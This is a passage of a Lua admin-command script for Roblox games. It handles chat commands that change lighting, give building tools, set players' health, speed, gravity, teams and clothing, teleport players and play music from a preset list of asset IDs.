  3143. 1051.local chk1 = msg:lower():sub(9):find(" ") + 8
  3144.  
  3145.  
  3146. 1052.local chk2 = msg:sub(chk1+1):find(" ") + chk1
  3147.  
  3148.  
  3149. 1053.game.Lighting.Ambient = Color3.new(msg:sub(9,chk1-1),msg:sub(chk1+1,chk2-1),msg:sub(chk2+1))
  3150.  
  3151.  
  3152. 1054.end
  3153.  
  3154.  
  3155. 1055.
  3156.  
  3157.  
  3158. 1056.if msg:lower():sub(1,11) == "brightness " then
  3159.  
  3160.  
  3161. 1057.game.Lighting.Brightness = msg:sub(12)
  3162.  
  3163.  
  3164. 1058.end
  3165.  
  3166.  
  3167. 1059.
  3168.  
  3169.  
  3170. 1060.if msg:lower():sub(1,5) == "time " then
  3171.  
  3172.  
  3173. 1061.game.Lighting.TimeOfDay = msg:sub(6)
  3174.  
  3175.  
  3176. 1062.end
  3177.  
  3178.  
  3179. 1063.
  3180.  
  3181.  
  3182. 1064.if msg:lower():sub(1,9) == "fogcolor " then
  3183.  
  3184.  
  3185. 1065.local chk1 = msg:lower():sub(10):find(" ") + 9
  3186.  
  3187.  
  3188. 1066.local chk2 = msg:sub(chk1+1):find(" ") + chk1
  3189.  
  3190.  
  3191. 1067.game.Lighting.FogColor = Color3.new(msg:sub(10,chk1-1),msg:sub(chk1+1,chk2-1),msg:sub(chk2+1))
  3192.  
  3193.  
  3194. 1068.end
  3195.  
  3196.  
  3197. 1069.
  3198.  
  3199.  
  3200. 1070.if msg:lower():sub(1,7) == "fogend " then
  3201.  
  3202.  
  3203. 1071.game.Lighting.FogEnd = msg:sub(8)
  3204.  
  3205.  
  3206. 1072.end
  3207.  
  3208.  
  3209. 1073.
  3210.  
  3211.  
  3212. 1074.if msg:lower():sub(1,9) == "fogstart " then
  3213.  
  3214.  
  3215. 1075.game.Lighting.FogStart = msg:sub(10)
  3216.  
  3217.  
  3218. 1076.end
  3219.  
  3220.  
  3221. 1077.
  3222.  
  3223.  
  3224. 1078.if msg:lower():sub(1,7) == "btools " then
  3225.  
  3226.  
  3227. 1079.local plrz = GetPlr(plr, msg:lower():sub(8))
  3228.  
  3229.  
  3230. 1080.for i, v in pairs(plrz) do
  3231.  
  3232.  
  3233. 1081.coroutine.resume(coroutine.create(function()
  3234.  
  3235.  
  3236. 1082.if v and v:findFirstChild("Backpack") then
  3237.  
  3238.  
  3239. 1083.local t1 = Instance.new("HopperBin", v.Backpack) t1.Name = "Move" t1.BinType = "GameTool"
  3240.  
  3241.  
  3242. 1084.local t2 = Instance.new("HopperBin", v.Backpack) t2.Name = "Clone" t2.BinType = "Clone"
  3243.  
  3244.  
  3245. 1085.local t3 = Instance.new("HopperBin", v.Backpack) t3.Name = "Delete" t3.BinType = "Hammer"
  3246.  
  3247.  
  3248. 1086.local t4= Instance.new("HopperBin", v.Backpack) t4.Name = "Resize"
  3249.  
  3250.  
  3251. 1087.local cl4 = script.LocalScriptBase:Clone() cl4.Parent = t4 cl4.Code.Value = [[
  3252.  
  3253.  
  3254. 1088.repeat wait() until game.Players.LocalPlayer and game.Players.LocalPlayer.Character and game.Players.LocalPlayer:findFirstChild("PlayerGui")
  3255.  
  3256.  
  3257. 1089.local sb
  3258.  
  3259.  
  3260. 1090.local hs
  3261.  
  3262.  
  3263. 1091.local pdist
  3264.  
  3265.  
  3266. 1092.
  3267.  
  3268.  
  3269. 1093.script.Parent.Selected:connect(function(mouse)
  3270.  
  3271.  
  3272. 1094.if not mouse then return end
  3273.  
  3274.  
  3275. 1095.sb = Instance.new("SelectionBox", game.Players.LocalPlayer.PlayerGui) sb.Color = BrickColor.new("Bright blue") sb.Adornee = nil
  3276.  
  3277.  
  3278. 1096.hs = Instance.new("Handles", game.Players.LocalPlayer.PlayerGui) hs.Color = BrickColor.new("Bright blue") hs.Adornee = nil
  3279.  
  3280.  
  3281. 1097.mouse.Button1Down:connect(function() if not mouse.Target or mouse.Target.Locked then sb.Adornee = nil hs.Adornee = nil else sb.Adornee = mouse.Target hs.Adornee = mouse.Target hs.Faces = mouse.Target.ResizeableFaces end end)
  3282.  
  3283.  
  3284. 1098.hs.MouseDrag:connect(function(old,dist) if hs.Adornee and math.abs(dist-pdist) >= hs.Adornee.ResizeIncrement then if hs.Adornee:Resize(old, math.floor((dist-pdist)/ hs.Adornee.ResizeIncrement + .5) * hs.Adornee.ResizeIncrement) then pdist = dist end end end)
  3285.  
  3286.  
  3287. 1099.hs.MouseButton1Down:connect(function() pdist = 0 end)
  3288.  
  3289.  
  3290. 1100.end)
  3291.  
  3292.  
  3293. 1101.
  3294.  
  3295.  
  3296. 1102.script.Parent.Deselected:connect(function() sb:Destroy() hs:Destroy() end)]] cl4.Disabled = false
  3297.  
  3298.  
  3299. 1103.end
  3300.  
  3301.  
  3302. 1104.end))
  3303.  
  3304.  
  3305. 1105.end
  3306.  
  3307.  
  3308. 1106.end
  3309.  
  3310.  
  3311. 1107.
  3312.  
  3313.  
  3314. 1108.if msg:lower():sub(1,5) == "give " then
  3315.  
  3316.  
  3317. 1109.local chk1 = msg:lower():sub(6):find(" ") + 5
  3318.  
  3319.  
  3320. 1110.local plrz = GetPlr(plr, msg:lower():sub(6,chk1-1))
  3321.  
  3322.  
  3323. 1111.for i, v in pairs(plrz) do
  3324.  
  3325.  
  3326. 1112.coroutine.resume(coroutine.create(function()
  3327.  
  3328.  
  3329. 1113.if v and v:findFirstChild("Backpack") and game:findFirstChild("Lighting") then
  3330.  
  3331.  
  3332. 1114.for a, tool in pairs(game.Lighting:children()) do
  3333.  
  3334.  
  3335. 1115.if tool:IsA("Tool") or tool:IsA("HopperBin") then
  3336.  
  3337.  
  3338. 1116.if msg:lower():sub(chk1+1) == "all" or tool.Name:lower():find(msg:lower():sub(chk1+1)) == 1 then tool:Clone().Parent = v.Backpack end
  3339.  
  3340.  
  3341. 1117.end
  3342.  
  3343.  
  3344. 1118.end
  3345.  
  3346.  
  3347. 1119.end
  3348.  
  3349.  
  3350. 1120.end))
  3351.  
  3352.  
  3353. 1121.end
  3354.  
  3355.  
  3356. 1122.end
  3357.  
  3358.  
  3359. 1123.
  3360.  
  3361.  
  3362. 1124.if msg:lower():sub(1,12) == "removetools " then
  3363.  
  3364.  
  3365. 1125.local plrz = GetPlr(plr, msg:lower():sub(13))
  3366.  
  3367.  
  3368. 1126.for i, v in pairs(plrz) do
  3369.  
  3370.  
  3371. 1127.coroutine.resume(coroutine.create(function()
  3372.  
  3373.  
  3374. 1128.if v and v.Character and v:findFirstChild("Backpack") then
  3375.  
  3376.  
  3377. 1129.for a, tool in pairs(v.Character:children()) do if tool:IsA("Tool") or tool:IsA("HopperBin") then tool:Destroy() end end
  3378.  
  3379.  
  3380. 1130.for a, tool in pairs(v.Backpack:children()) do if tool:IsA("Tool") or tool:IsA("HopperBin") then tool:Destroy() end end
  3381.  
  3382.  
  3383. 1131.end
  3384.  
  3385.  
  3386. 1132.end))
  3387.  
  3388.  
  3389. 1133.end
  3390.  
  3391.  
  3392. 1134.end
  3393.  
  3394.  
  3395. 1135.
  3396.  
  3397.  
  3398. 1136.if msg:lower():sub(1,5) == "rank " then
  3399.  
  3400.  
  3401. 1137.local chk1 = msg:lower():sub(6):find(" ") + 5
  3402.  
  3403.  
  3404. 1138.local plrz = GetPlr(plr, msg:lower():sub(6,chk1-1))
  3405.  
  3406.  
  3407. 1139.for i, v in pairs(plrz) do
  3408.  
  3409.  
  3410. 1140.coroutine.resume(coroutine.create(function()
  3411.  
  3412.  
  3413. 1141.if v and v:IsInGroup(msg:sub(chk1+1)) then
  3414.  
  3415.  
  3416. 1142.Hint("[" .. v:GetRankInGroup(msg:sub(chk1+1)) .. "] " .. v:GetRoleInGroup(msg:sub(chk1+1)), {plr})
  3417.  
  3418.  
  3419. 1143.elseif v and not v:IsInGroup(msg:sub(chk1+1))then
  3420.  
  3421.  
  3422. 1144.Hint(v.Name .. " is not in the group " .. msg:sub(chk1+1), {plr})
  3423.  
  3424.  
  3425. 1145.end
  3426.  
  3427.  
  3428. 1146.end))
  3429.  
  3430.  
  3431. 1147.end
  3432.  
  3433.  
  3434. 1148.end
  3435.  
  3436.  
  3437. 1149.
  3438.  
  3439.  
  3440. 1150.if msg:lower():sub(1,7) == "damage " then
  3441.  
  3442.  
  3443. 1151.local chk1 = msg:lower():sub(8):find(" ") + 7
  3444.  
  3445.  
  3446. 1152.local plrz = GetPlr(plr, msg:lower():sub(8,chk1-1))
  3447.  
  3448.  
  3449. 1153.for i, v in pairs(plrz) do
  3450.  
  3451.  
  3452. 1154.coroutine.resume(coroutine.create(function()
  3453.  
  3454.  
  3455. 1155.if v and v.Character and v.Character:findFirstChild("Humanoid") then
  3456.  
  3457.  
  3458. 1156.v.Character.Humanoid:TakeDamage(msg:sub(chk1+1))
  3459.  
  3460.  
  3461. 1157.end
  3462.  
  3463.  
  3464. 1158.end))
  3465.  
  3466.  
  3467. 1159.end
  3468.  
  3469.  
  3470. 1160.end
  3471.  
  3472.  
  3473. 1161.
  3474.  
  3475.  
  3476. 1162.if msg:lower():sub(1,5) == "grav " then
  3477.  
  3478.  
  3479. 1163.local plrz = GetPlr(plr, msg:lower():sub(6))
  3480.  
  3481.  
  3482. 1164.for i, v in pairs(plrz) do
  3483.  
  3484.  
  3485. 1165.coroutine.resume(coroutine.create(function()
  3486.  
  3487.  
  3488. 1166.if v and v.Character and v.Character:findFirstChild("Torso") then
  3489.  
  3490.  
  3491. 1167.for a, frc in pairs(v.Character.Torso:children()) do if frc.Name == "BFRC" then frc:Destroy() end end
  3492.  
  3493.  
  3494. 1168.end
  3495.  
  3496.  
  3497. 1169.end))
  3498.  
  3499.  
  3500. 1170.end
  3501.  
  3502.  
  3503. 1171.end
  3504.  
  3505.  
  3506. 1172.
  3507.  
  3508.  
  3509. 1173.if msg:lower():sub(1,8) == "setgrav " then
  3510.  
  3511.  
  3512. 1174.local chk1 = msg:lower():sub(9):find(" ") + 8
  3513.  
  3514.  
  3515. 1175.local plrz = GetPlr(plr, msg:lower():sub(9,chk1-1))
  3516.  
  3517.  
  3518. 1176.for i, v in pairs(plrz) do
  3519.  
  3520.  
  3521. 1177.coroutine.resume(coroutine.create(function()
  3522.  
  3523.  
  3524. 1178.if v and v.Character and v.Character:findFirstChild("Torso") then
  3525.  
  3526.  
  3527. 1179.for a, frc in pairs(v.Character.Torso:children()) do if frc.Name == "BFRC" then frc:Destroy() end end
  3528.  
  3529.  
  3530. 1180.local frc = Instance.new("BodyForce", v.Character.Torso) frc.Name = "BFRC" frc.force = Vector3.new(0,0,0)
  3531.  
  3532.  
  3533. 1181.for a, prt in pairs(v.Character:children()) do if prt:IsA("BasePart") then frc.force = frc.force - Vector3.new(0,prt:GetMass()*msg:sub(chk1+1),0) elseif prt:IsA("Hat") then frc.force = frc.force - Vector3.new(0,prt.Handle:GetMass()*msg:sub(chk1+1),0) end end
  3534.  
  3535.  
  3536. 1182.end
  3537.  
  3538.  
  3539. 1183.end))
  3540.  
  3541.  
  3542. 1184.end
  3543.  
  3544.  
  3545. 1185.end
  3546.  
  3547.  
  3548. 1186.
  3549.  
  3550.  
  3551. 1187.if msg:lower():sub(1,7) == "nograv " then
  3552.  
  3553.  
  3554. 1188.local plrz = GetPlr(plr, msg:lower():sub(8))
  3555.  
  3556.  
  3557. 1189.for i, v in pairs(plrz) do
  3558.  
  3559.  
  3560. 1190.coroutine.resume(coroutine.create(function()
  3561.  
  3562.  
  3563. 1191.if v and v.Character and v.Character:findFirstChild("Torso") then
  3564.  
  3565.  
  3566. 1192.for a, frc in pairs(v.Character.Torso:children()) do if frc.Name == "BFRC" then frc:Destroy() end end
  3567.  
  3568.  
  3569. 1193.local frc = Instance.new("BodyForce", v.Character.Torso) frc.Name = "BFRC" frc.force = Vector3.new(0,0,0)
  3570.  
  3571.  
  3572. 1194.for a, prt in pairs(v.Character:children()) do if prt:IsA("BasePart") then frc.force = frc.force + Vector3.new(0,prt:GetMass()*196.25,0) elseif prt:IsA("Hat") then frc.force = frc.force + Vector3.new(0,prt.Handle:GetMass()*196.25,0) end end
  3573.  
  3574.  
  3575. 1195.end
  3576.  
  3577.  
  3578. 1196.end))
  3579.  
  3580.  
  3581. 1197.end
  3582.  
  3583.  
  3584. 1198.end
  3585.  
  3586.  
  3587. 1199.
  3588.  
  3589.  
  3590. 1200.if msg:lower():sub(1,7) == "health " then
  3591.  
  3592.  
  3593. 1201.local chk1 = msg:lower():sub(8):find(" ") + 7
  3594.  
  3595.  
  3596. 1202.local plrz = GetPlr(plr, msg:lower():sub(8,chk1-1))
  3597.  
  3598.  
  3599. 1203.for i, v in pairs(plrz) do
  3600.  
  3601.  
  3602. 1204.coroutine.resume(coroutine.create(function()
  3603.  
  3604.  
  3605. 1205.if v and v.Character and v.Character:findFirstChild("Humanoid") then
  3606.  
  3607.  
  3608. 1206.v.Character.Humanoid.MaxHealth = msg:sub(chk1+1)
  3609.  
  3610.  
  3611. 1207.v.Character.Humanoid.Health = v.Character.Humanoid.MaxHealth
  3612.  
  3613.  
  3614. 1208.end
  3615.  
  3616.  
  3617. 1209.end))
  3618.  
  3619.  
  3620. 1210.end
  3621.  
  3622.  
  3623. 1211.end
  3624.  
  3625.  
  3626. 1212.
  3627.  
  3628.  
  3629. 1213.if msg:lower():sub(1,6) == "speed " then
  3630.  
  3631.  
  3632. 1214.local chk1 = msg:lower():sub(7):find(" ") + 6
  3633.  
  3634.  
  3635. 1215.local plrz = GetPlr(plr, msg:lower():sub(7,chk1-1))
  3636.  
  3637.  
  3638. 1216.for i, v in pairs(plrz) do
  3639.  
  3640.  
  3641. 1217.coroutine.resume(coroutine.create(function()
  3642.  
  3643.  
  3644. 1218.if v and v.Character and v.Character:findFirstChild("Humanoid") then
  3645.  
  3646.  
  3647. 1219.v.Character.Humanoid.WalkSpeed = msg:sub(chk1+1)
  3648.  
  3649.  
  3650. 1220.end
  3651.  
  3652.  
  3653. 1221.end))
  3654.  
  3655.  
  3656. 1222.end
  3657.  
  3658.  
  3659. 1223.end
  3660.  
  3661.  
  3662. 1224.
  3663.  
  3664.  
  3665. 1225.if msg:lower():sub(1,5) == "team " then
  3666.  
  3667.  
  3668. 1226.local chk1 = msg:lower():sub(6):find(" ") + 5
  3669.  
  3670.  
  3671. 1227.local plrz = GetPlr(plr, msg:lower():sub(6,chk1-1))
  3672.  
  3673.  
  3674. 1228.for i, v in pairs(plrz) do
  3675.  
  3676.  
  3677. 1229.coroutine.resume(coroutine.create(function()
  3678.  
  3679.  
  3680. 1230.if v and game:findFirstChild("Teams") then
  3681.  
  3682.  
  3683. 1231.for a, tm in pairs(game.Teams:children()) do
  3684.  
  3685.  
  3686. 1232.if tm.Name:lower():find(msg:lower():sub(chk1+1)) == 1 then v.TeamColor = tm.TeamColor end
  3687.  
  3688.  
  3689. 1233.end
  3690.  
  3691.  
  3692. 1234.end
  3693.  
  3694.  
  3695. 1235.end))
  3696.  
  3697.  
  3698. 1236.end
  3699.  
  3700.  
  3701. 1237.end
  3702.  
  3703.  
  3704. 1238.
  3705.  
  3706.  
  3707. 1239.if msg:lower():sub(1,6) == "place " then
  3708.  
  3709.  
  3710. 1240.local chk1 = msg:lower():sub(7):find(" ") + 6
  3711.  
  3712.  
  3713. 1241.local plrz = GetPlr(plr, msg:lower():sub(7,chk1-1))
  3714.  
  3715.  
  3716. 1242.for i, v in pairs(plrz) do
  3717.  
  3718.  
  3719. 1243.coroutine.resume(coroutine.create(function()
  3720.  
  3721.  
  3722. 1244.if v and v:findFirstChild("PlayerGui") then
  3723.  
  3724.  
  3725. 1245.local cl = script.LocalScriptBase:Clone() cl.Code.Value = [[game:service("TeleportService"):Teleport(]] .. msg:sub(chk1+1) .. ")" cl.Parent = v.PlayerGui cl.Disabled = false
  3726.  
  3727.  
  3728. 1246.end
  3729.  
  3730.  
  3731. 1247.end))
  3732.  
  3733.  
  3734. 1248.end
  3735.  
  3736.  
  3737. 1249.end
  3738.  
  3739.  
  3740. 1250.
  3741.  
  3742.  
  3743. 1251.if msg:lower():sub(1,3) == "tp " then
  3744.  
  3745.  
  3746. 1252.local chk1 = msg:lower():sub(4):find(" ") + 3
  3747.  
  3748.  
  3749. 1253.local plrz = GetPlr(plr, msg:lower():sub(4,chk1-1))
  3750.  
  3751.  
  3752. 1254.local plrz2 = GetPlr(plr, msg:lower():sub(chk1+1))
  3753.  
  3754.  
  3755. 1255.for i, v in pairs(plrz) do
  3756.  
  3757.  
  3758. 1256.coroutine.resume(coroutine.create(function()
  3759.  
  3760.  
  3761. 1257.for i2, v2 in pairs(plrz2) do
  3762.  
  3763.  
  3764. 1258.if v and v2 and v.Character and v2.Character and v.Character:findFirstChild("Torso") and v2.Character:findFirstChild("Torso") then
  3765.  
  3766.  
  3767. 1259.v.Character.Torso.CFrame = v2.Character.Torso.CFrame + Vector3.new(math.random(-1,1),0,math.random(-1,1))
  3768.  
  3769.  
  3770. 1260.end
  3771.  
  3772.  
  3773. 1261.end
  3774.  
  3775.  
  3776. 1262.end))
  3777.  
  3778.  
  3779. 1263.end
  3780.  
  3781.  
  3782. 1264.end
  3783.  
  3784.  
  3785. 1265.
  3786.  
  3787.  
  3788. 1266.if msg:lower():sub(1,7) == "change " then
  3789.  
  3790.  
  3791. 1267.local chk1 = msg:lower():sub(8):find(" ") + 7
  3792.  
  3793.  
  3794. 1268.local chk2 = msg:sub(chk1+1):find(" ") + chk1
  3795.  
  3796.  
  3797. 1269.local plrz = GetPlr(plr, msg:lower():sub(8,chk1-1))
  3798.  
  3799.  
  3800. 1270.for i, v in pairs(plrz) do
  3801.  
  3802.  
  3803. 1271.coroutine.resume(coroutine.create(function()
  3804.  
  3805.  
  3806. 1272.if v and v:findFirstChild("leaderstats") then
  3807.  
  3808.  
  3809. 1273.for a, st in pairs(v.leaderstats:children()) do
  3810.  
  3811.  
  3812. 1274.if st.Name:lower():find(msg:sub(chk1+1,chk2-1)) == 1 then st.Value = msg:sub(chk2+1) end
  3813.  
  3814.  
  3815. 1275.end
  3816.  
  3817.  
  3818. 1276.end
  3819.  
  3820.  
  3821. 1277.end))
  3822.  
  3823.  
  3824. 1278.end
  3825.  
  3826.  
  3827. 1279.end
  3828.  
  3829.  
  3830. 1280.
  3831.  
  3832.  
  3833. 1281.if msg:lower():sub(1,6) == "shirt " then
  3834.  
  3835.  
  3836. 1282.local chk1 = msg:lower():sub(7):find(" ") + 6
  3837.  
  3838.  
  3839. 1283.local plrz = GetPlr(plr, msg:lower():sub(7,chk1-1))
  3840.  
  3841.  
  3842. 1284.for i, v in pairs(plrz) do
  3843.  
  3844.  
  3845. 1285.coroutine.resume(coroutine.create(function()
  3846.  
  3847.  
  3848. 1286.if v and v.Character then
  3849.  
  3850.  
  3851. 1287.for i,v in pairs(v.Character:children()) do
  3852.  
  3853.  
  3854. 1288.if v:IsA("Shirt") then local cl = v:Clone() cl.Parent = v.Parent cl.ShirtTemplate = "http://www.roblox.com/asset/?id=" .. chk1 v:Destroy() end
  3855.  
  3856.  
  3857. 1289.end
  3858.  
  3859.  
  3860. 1290.end
  3861.  
  3862.  
  3863. 1291.end))
  3864.  
  3865.  
  3866. 1292.end
  3867.  
  3868.  
  3869. 1293.end
  3870.  
  3871.  
  3872. 1294.
  3873.  
  3874.  
  3875. 1295.if msg:lower():sub(1,6) == "pants " then
  3876.  
  3877.  
  3878. 1296.local chk1 = msg:lower():sub(7):find(" ") + 6
  3879.  
  3880.  
  3881. 1297.local plrz = GetPlr(plr, msg:lower():sub(7,chk1-1))
  3882.  
  3883.  
  3884. 1298.for i, v in pairs(plrz) do
  3885.  
  3886.  
  3887. 1299.coroutine.resume(coroutine.create(function()
  3888.  
  3889.  
  3890. 1300.if v and v.Character then
  3891.  
  3892.  
  3893. 1301.for i,v in pairs(v.Character:children()) do
  3894.  
  3895.  
  3896. 1302.if v:IsA("Pants") then local cl = v:Clone() cl.Parent = v.Parent cl.PantsTemplate = "http://www.roblox.com/asset/?id=" .. chk1 v:Destroy() end
  3897.  
  3898.  
  3899. 1303.end
  3900.  
  3901.  
  3902. 1304.end
  3903.  
  3904.  
  3905. 1305.end))
  3906.  
  3907.  
  3908. 1306.end
  3909.  
  3910.  
  3911. 1307.end
  3912.  
  3913.  
  3914. 1308.
  3915.  
  3916.  
  3917. 1309.if msg:lower():sub(1,5) == "face " then
  3918.  
  3919.  
  3920. 1310.local chk1 = msg:lower():sub(6):find(" ") + 5
  3921.  
  3922.  
  3923. 1311.local plrz = GetPlr(plr, msg:lower():sub(6,chk1-1))
  3924.  
  3925.  
  3926. 1312.for i, v in pairs(plrz) do
  3927.  
  3928.  
  3929. 1313.coroutine.resume(coroutine.create(function()
  3930.  
  3931.  
  3932. 1314.if v and v.Character and v.Character:findFirstChild("Head") and v.Character.Head:findFirstChild("face") then
  3933.  
  3934.  
  3935. 1315.v.Character.Head:findFirstChild("face").Texture = "http://www.roblox.com/asset/?id=" .. chk1
  3936.  
  3937.  
  3938. 1316.end
  3939.  
  3940.  
  3941. 1317.end))
  3942.  
  3943.  
  3944. 1318.end
  3945.  
  3946.  
  3947. 1319.end
  3948.  
  3949.  
  3950. 1320.
  3951.  
  3952.  
  3953. 1321.------------------
  3954.  
  3955.  
  3956. 1322.-- Fun Commands --
  3957.  
  3958.  
  3959. 1323.------------------
  3960.  
  3961.  
  3962. 1324.if FunCommands or plr.userId == game.CreatorId or ChkOwner(plr.Name:lower()) then
  3963.  
  3964.  
  3965. 1325.
  3966.  
  3967.  
  3968. 1326.if msg:lower():sub(1,8) == "swagify " then
  3969.  
  3970.  
  3971. 1327.local plrz = GetPlr(plr, msg:lower():sub(9))
  3972.  
  3973.  
  3974. 1328.for i, v in pairs(plrz) do
  3975.  
  3976.  
  3977. 1329.coroutine.resume(coroutine.create(function()
  3978.  
  3979.  
  3980. 1330.if v and v.Character then
  3981.  
  3982.  
  3983. 1331.for i,v in pairs(v.Character:children()) do
  3984.  
  3985.  
  3986. 1332.if v.Name == "Shirt" then local cl = v:Clone() cl.Parent = v.Parent cl.ShirtTemplate = "http://www.roblox.com/asset/?id=109163376" v:Destroy() end
  3987.  
  3988.  
  3989. 1333.if v.Name == "Pants" then local cl = v:Clone() cl.Parent = v.Parent cl.PantsTemplate = "http://www.roblox.com/asset/?id=109163376" v:Destroy() end
  3990.  
  3991.  
  3992. 1334.end
  3993.  
  3994.  
  3995. 1335.for a,cp in pairs(v.Character:children()) do if cp.Name == "EpicCape" then cp:Destroy() end end
  3996.  
  3997.  
  3998. 1336.local cl = script.LocalScriptBase:Clone() cl.Name = "CapeScript" cl.Code.Value = [[local plr = game.Players.LocalPlayer
  3999.  
  4000.  
  4001. 1337.repeat wait() until plr and plr.Character and plr.Character:findFirstChild("Torso")
  4002.  
  4003.  
  4004. 1338.local torso = plr.Character.Torso
  4005.  
  4006.  
  4007. 1339.local p = Instance.new("Part", torso.Parent) p.Name = "EpicCape" p.Anchored = false
  4008.  
  4009.  
  4010. 1340.p.CanCollide = false p.TopSurface = 0 p.BottomSurface = 0 p.BrickColor = BrickColor.new("Pink") local dec = Instance.new("Decal", p) dec.Face = 2 dec.Texture = "http://www.roblox.com/asset/?id=109301474" p.formFactor = "Custom"
  4011.  
  4012.  
  4013. 1341.p.Size = Vector3.new(.2,.2,.2)
  4014.  
  4015.  
  4016. 1342.local msh = Instance.new("BlockMesh", p) msh.Scale = Vector3.new(9,17.5,.5)
  4017.  
  4018.  
  4019. 1343.local motor1 = Instance.new("Motor", p)
  4020.  
  4021.  
  4022. 1344.motor1.Part0 = p
  4023.  
  4024.  
  4025. 1345.motor1.Part1 = torso
  4026.  
  4027.  
  4028. 1346.motor1.MaxVelocity = .01
  4029.  
  4030.  
  4031. 1347.motor1.C0 = CFrame.new(0,1.75,0)*CFrame.Angles(0,math.rad(90),0)
  4032.  
  4033.  
  4034. 1348.motor1.C1 = CFrame.new(0,1,.45)*CFrame.Angles(0,math.rad(90),0)
  4035.  
  4036.  
  4037. 1349.local wave = false
  4038.  
  4039.  
  4040. 1350.repeat wait(1/44)
  4041.  
  4042.  
  4043. 1351.local ang = 0.1
  4044.  
  4045.  
  4046. 1352.local oldmag = torso.Velocity.magnitude
  4047.  
  4048.  
  4049. 1353.local mv = .002
  4050.  
  4051.  
  4052. 1354.if wave then ang = ang + ((torso.Velocity.magnitude/10)*.05)+.05 wave = false else wave = true end
  4053.  
  4054.  
  4055. 1355.ang = ang + math.min(torso.Velocity.magnitude/11, .5)
  4056.  
  4057.  
  4058. 1356.motor1.MaxVelocity = math.min((torso.Velocity.magnitude/111), .04) + mv
  4059.  
  4060.  
  4061. 1357.motor1.DesiredAngle = -ang
  4062.  
  4063.  
  4064. 1358.if motor1.CurrentAngle < -.2 and motor1.DesiredAngle > -.2 then motor1.MaxVelocity = .04 end
  4065.  
  4066.  
  4067. 1359.repeat wait() until motor1.CurrentAngle == motor1.DesiredAngle or math.abs(torso.Velocity.magnitude - oldmag) >= (torso.Velocity.magnitude/10) + 1
  4068.  
  4069.  
  4070. 1360.if torso.Velocity.magnitude < .1 then wait(.1) end
  4071.  
  4072.  
  4073. 1361.until not p or p.Parent ~= torso.Parent
  4074.  
  4075.  
  4076. 1362.script:Destroy()
  4077.  
  4078.  
  4079. 1363.]] cl.Parent = v.PlayerGui cl.Disabled = false
  4080.  
  4081.  
  4082. 1364.end
  4083.  
  4084.  
  4085. 1365.end))
  4086.  
  4087.  
  4088. 1366.end
  4089.  
  4090.  
  4091. 1367.end
  4092.  
  4093.  
  4094. 1368.
  4095.  
  4096.  
  4097. 1369.if msg:lower():sub(1,6) == "music " then
  4098.  
  4099.  
  4100. 1370.for i, v in pairs(game.Workspace:children()) do if v:IsA("Sound") then v:Destroy() end end
  4101.  
  4102.  
  4103. 1371.local id = msg:sub(7)
  4104.  
  4105.  
  4106. 1372.local pitch = 1
  4107.  
  4108.  
  4109. 1373.if tostring(id):lower():find("caramell") then id = 2303479 end
  4110.  
  4111.  
  4112. 1374.if tostring(id):find("epic") then id = 27697743 pitch = 2.5 end
  4113.  
  4114.  
  4115. 1375.if tostring(id):find("rick") then id = 2027611 end
  4116.  
  4117.  
  4118. 1376.if tostring(id):find("halo") then id = 1034065 end
  4119.  
  4120.  
  4121. 1377.if tostring(id):find("pokemon") then id = 1372261 end
  4122.  
  4123.  
  4124. 1378.if tostring(id):find("cursed") then id = 1372257 end
  4125.  
  4126.  
  4127. 1379.if tostring(id):find("extreme") then id = 11420933 end
  4128.  
  4129.  
  4130. 1380.if tostring(id):find("awaken") then id = 27697277 end
  4131.  
  4132.  
  4133. 1381.if tostring(id):find("alone") then id = 27697392 end
  4134.  
  4135.  
  4136. 1382.if tostring(id):find("mario") then id = 1280470 end
  4137.  
  4138.  
  4139. 1383.if tostring(id):find("choir") then id = 1372258 end
  4140.  
  4141.  
  4142. 1384.if tostring(id):find("chrono") then id = 1280463 end
  4143.  
  4144.  
  4145. 1385.if tostring(id):find("dotr") then id = 11420922 end
  4146.  
  4147.  
  4148. 1386.if tostring(id):find("entertain") then id = 27697267 end
  4149.  
  4150.  
  4151. 1387.if tostring(id):find("fantasy") then id = 1280473 end
  4152.  
  4153.  
  4154. 1388.if tostring(id):find("final") then id = 1280414 end
  4155.  
  4156.  
  4157. 1389.if tostring(id):find("emblem") then id = 1372259 end
  4158.  
  4159.  
  4160. 1390.if tostring(id):find("flight") then id = 27697719 end
  4161.  
  4162.  
  4163. 1391.if tostring(id):find("banjo") then id = 27697298 end
  4164.  
  4165.  
  4166. 1392.if tostring(id):find("gothic") then id = 27697743 end
  4167.  
  4168.  
  4169. 1393.if tostring(id):find("hiphop") then id = 27697735 end
  4170.  
  4171.  
  4172. 1394.if tostring(id):find("intro") then id = 27697707 end
  4173.  
  4174.  
  4175. 1395.if tostring(id):find("mule") then id = 1077604 end
  4176.  
  4177.  
  4178. 1396.if tostring(id):find("film") then id = 27697713 end
  4179.  
  4180.  
  4181. 1397.if tostring(id):find("nezz") then id = 8610025 end
  4182.  
  4183.  
  4184. 1398.if tostring(id):find("angel") then id = 1372260 end
  4185.  
  4186.  
  4187. 1399.if tostring(id):find("resist") then id = 27697234 end
  4188.  
  4189.  
  4190. 1400.if tostring(id):find("schala") then id = 5985787 end
  4191.  
  4192.  
  4193. 1401.if tostring(id):find("organ") then id = 11231513 end
  4194.  
  4195.  
  4196. 1402.if tostring(id):find("tunnel") then id = 9650822 end
  4197.  
  4198.  
  4199. 1403.if tostring(id):find("spanish") then id = 5982975 end
  4200.  
  4201.  
  4202. 1404.if tostring(id):find("venom") then id = 1372262 end
  4203.  
  4204.  
  4205. 1405.if tostring(id):find("wind") then id = 1015394 end
  4206.  
  4207.  
  4208. 1406.if tostring(id):find("guitar") then id = 5986151 end
  4209.  
  4210.  
  4211. 1407.local s = Instance.new("Sound", game.Workspace) s.SoundId = "http://www.roblox.com/asset/?id=" .. id s.Volume = 1 s.Pitch = pitch s.Looped = true s.archivable = false repeat s:Play() wait(2.5) s:Stop() wait(.5) s:Play() until s.IsPlaying
  4212.  
  4213.  
  4214. 1408.end
  4215.  
  4216.  
  4217. 1409.
  4218.  
  4219.  
  4220. 1410.if msg:lower() == "stopmusic" then
  4221.  
  4222.  
  4223. 1411.for i, v in pairs(game.Workspace:children()) do if v:IsA("Sound") then v:Destroy() end end
  4224.  
  4225.  
  4226. 1412.end
  4227.  
  4228.  
  4229. 1413.
  4230.  
  4231.  
  4232. 1414.if msg:lower() == "musiclist" then
  4233.  
  4234.  
  4235. 1415.if plr.PlayerGui:findFirstChild("MUSICGUI") then return end
  4236.  
  4237.  
  4238. 1416.local scr, cmf, ent, num = ScrollGui() scr.Name = "MUSICGUI" scr.Parent = plr.PlayerGui
  4239.  
  4240.  
